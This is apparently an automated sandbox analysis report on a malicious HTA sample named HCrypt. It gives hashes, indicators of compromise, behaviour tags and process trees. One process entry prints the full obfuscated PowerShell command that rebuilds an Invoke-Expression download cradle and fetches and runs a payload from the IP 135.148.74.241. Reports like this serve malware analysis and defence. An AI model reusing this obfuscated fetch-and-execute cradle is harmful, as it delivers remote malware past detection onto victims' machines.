135.148.74.241_HCrypt.zip

max time kernel117s
max time network117s
platformwindows7_x64
resourcewin7-en-20211208
submitted20-01-2022 14:32

Report
Files
Registry
Network
Processes
Mutex
Misc

Target

135.148.74.241_HCrypt/PS1.hta

Filesize

3KB

Completed

20-01-2022 14:34

Score

10^/10

MD5

37f9dc388fedc16b308acaadc34c2054

SHA1

25c936c0b399b82ad39363f6237fd5db13369bda

SHA256

f30cba9be2a7cf581939e7e7b958d5e0554265a685b3473947bf2c26679995d3

Extracted

Language	ps1
Deobfuscated
URLs	http://135.148.74.241/PS1_B.txt exe.dropper http://135.148.74.241/PS1_B.txt

Defense Evasion

Discovery

Enumerates physical storage devices

Description

Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

TTPs

System Information Discovery

Modifies Internet Explorer settings

mshta.exe

TTPs

Modify Registry

Reported IOCs

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses
powershell.exe

Reported IOCs

pid process

1468 powershell.exe
Suspicious use of AdjustPrivilegeToken
powershell.exe

Reported IOCs

description pid process

Token: SeDebugPrivilege 1468 powershell.exe

pid	process
1468	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1468	powershell.exe

Suspicious use of WriteProcessMemory

mshta.exe

Reported IOCs

description	pid	process	target process
PID 760 wrote to memory of 1468	760	mshta.exe	powershell.exe
PID 760 wrote to memory of 1468	760	mshta.exe	powershell.exe
PID 760 wrote to memory of 1468	760	mshta.exe	powershell.exe
PID 760 wrote to memory of 1468	760	mshta.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\135.148.74.241_HCrypt\PS1.hta"

Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory

PID:760

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'http://135.148.74.241/PS1_B.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN

Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken

PID:1468

Collection

Command and Control

Credential Access

Defense Evasion

Modify Registry

Discovery

System Information Discovery

Execution

Exfiltration

Impact

Initial Access

Lateral Movement

Persistence

Privilege Escalation

00:00 00:00

memory/1468-53-0x0000000075D61000-0x0000000075D63000-memory.dmp

Download
memory/1468-56-0x0000000002560000-0x00000000031AA000-memory.dmp

Download
memory/1468-57-0x0000000002560000-0x00000000031AA000-memory.dmp

Download
memory/1468-58-0x0000000002560000-0x00000000031AA000-memory.dmp

Download

135.148.74.241_HCrypt.zip

Extracted

Filter: none

Description

TTPs

Tags

TTPs

Reported IOCs

Reported IOCs

Reported IOCs

Reported IOCs

Title